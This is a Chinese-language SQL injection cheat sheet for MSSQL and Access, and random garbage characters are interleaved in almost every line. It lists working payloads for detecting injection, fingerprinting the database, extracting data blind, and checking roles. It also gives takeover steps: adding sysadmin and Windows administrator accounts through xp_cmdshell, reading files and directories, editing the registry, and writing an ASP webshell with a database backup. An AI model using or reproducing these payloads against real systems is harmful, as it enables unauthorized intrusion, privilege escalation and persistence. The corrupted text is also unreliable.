1.判断是否有注入;and 1=1 ;and 1=2 `6:�;*#jO,
2.初步判断是否是mssql ;and user>0 |_V��i8�Ly
zlC|Sp�a�f
3.注入参数是字符'and [查询条件] and ''=' j0b?dK��d�
S�E=�3`rVJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }HB)%C50�.
8F|8zX�&��
5.判断数据库系统 o:E+c_^q`
�$
2'AY��
;and (select count(*) from sysobjects)>0 mssql `$j"nP� F_
~A<1xsz�C
;and (select count(*) from msysobjects)>0 access b|�F_]i �T
�\DsP��'-t
sM)qz�O2wh
�:#�8�#tLv
6.猜数据库 ;and (select Count(*) from [数据库名])>0 C'�x?ri�J/
��,c#IxB/0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 v'Y)~Kv@�!
pE{ZW�W[@+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �n_5m+
1�N
����L'k��)
9.(1)猜字段的ascii值(access) D<9FS�xl6
�U�N{_f)E?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <��eRE;8C-
p9]008C89
(2)猜字段的ascii值(mssql) 9Z�}Y2:l�'
)��G$/II9d
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 IV�$pA`�|V
s)�B�l1\Q�
10.测试权限结构(mssql) ycAQH�Y�~n
]j�N��v}{
VfAC&3�%M�
gf/$M[H! �
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- tRU+�6D
<w
_[|~(lDJl�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- -��V@vY42
vZj:�\g�eV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
'PW~�4f/m
�JSXudz5�c
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,�f0|e�u>�
�Q�ixEMX4<
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ER0nr�TlB<
�+92/0����
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- v%O� KOr�J
*nUD6(@g��
;and 1=(select IS_MEMBER('db_owner'));-- sE87}L���z
��39| �W(,
,!U.�_ic'B
pyA�;%�vJn
11.添加mssql和系统的帐户 ���^�`ah\L
:� vN'eL|#
;exec master.dbo.sp_addlogin username;-- *�Dx�&}�"�
;exec master.dbo.sp_password null,username,password;-- b�#;%T�bDF
f0rM �4"�1
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^_FB .y�%�
^|yw)N�]Q/
;exec master.dbo.xp_cmdshell 'net user username password ;Z]i$V�i_r
T�VVL1��wZ
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �9\�9:)q�
�p��o@=$HK
;exec master.dbo.xp_cmdshell 'net user username password /add';-- tU2�� 8l.�
vR$[�#`�X�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 'TWZ@8�h�~
]�?!#*<t r
5U)���Ia>p
Y r6wY�s(%
12.(1)遍历目录 y��8�"8Q�H
'0Qr�M,B�9
;create table dirs(paths varchar(100), id int) �dg[�&5D1Q
�_U}pd�zX?
;insert dirs exec master.dbo.xp_dirtree 'c:\' A$gP�: 1&m
p�x6�[1'|g
;and (select top 1 paths from dirs)>0 6Y4�sv�5G�
$10"lM[���
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �rr�o92(y
S?p��WxHR]
���olc7&R�
&'{6�_-k�h
(2)遍历目录 =6FA�(R|QU
'F�i\Qk'D@
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- jWHv9X�tW�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ?�.1yNO*s
�#-�S%ae�B
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 wLn,x;;��<
�M�*M,��Z�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ykFm$ 0m+I
�.�Cq'D.��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��'1'�#,u!
c*o05pMS��
1?:/8�l%�V
%j3XoRex><
13.mssql中的存储过程 �;vM&se�63
��AE`z~�L,
xp_regenumvalues 注册表根键, 子键 fBtTJ+�51}
!�S6zC� �>
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 G� 3)�)3]�
�hS�Q*_#��
xp_regread 根键,子键,键值名 S�]_io�bWK
X@l>mA�k��
;exec xp_regread 9H^$�cM9C�
M�T�m}qx@L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3>60_:+Zb
D#VUx9kugv
xp_regwrite 根键,子键, 值名, 值类型, 值 u.!�}s2wT#
$tKz|��H�)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;+��:�C��
}�>`rf�{�T
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @smjX�eF�o
j�z
CA2N%�
xp_regdeletevalue 根键,子键,值名 4%k{�vo5�i
{D�6lS���j
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 )�"W�__�U0
%UGX�gYD�z
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 a=m4)t��jk
?�T.' ��
q
�%x�(�||cq
p'SclH[���
14.mssql的backup创建webshell ~kHWh8\b:�
�?@�n�,
9!
use model �=3K}]3�f
ScN'|I�a.-
create table cmd(str image); {'O,G$Ldkr
�l�X g.�`
insert into cmd(str) values (''); �Ma�MP7O|W
�#)A�.yK`u
backup database model to disk='c:\l.asp'; .W;��,~.l�
bF_S�D�\/�
k*xM���e�-
�d v8q&_�
15.mssql内置函数 V�sIDd}~C%
Y52f8q��Qq
;and (select @@version)>0 获得Windows的版本号 B�qoGHg4iq
i�
n��$~(+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa b!�lS=zIN�
zD�ak�l�*
;and (select user_name())>0 爆当前系统的连接用户 4�i]�h0_�]
_k�'?�eZ�B
;and (select db_name())>0 得到当前连接的数据库 <c;�U 0! m
,��>
%=,x�
���m��$XMq
�wk+|� }s
16.简洁的webshell H�l�"^E*9x
)4O��>V?B�
use model W}6OMAbsE;
(U`<r�-n\n
create table cmd(str image); j��Wpm�"C
Vt�4K�G+zm
insert into cmd(str) values (''); �UnVYGc�h�
-l(G"]tR�B
backup database model to disk='g:\wwwtest\l.asp';
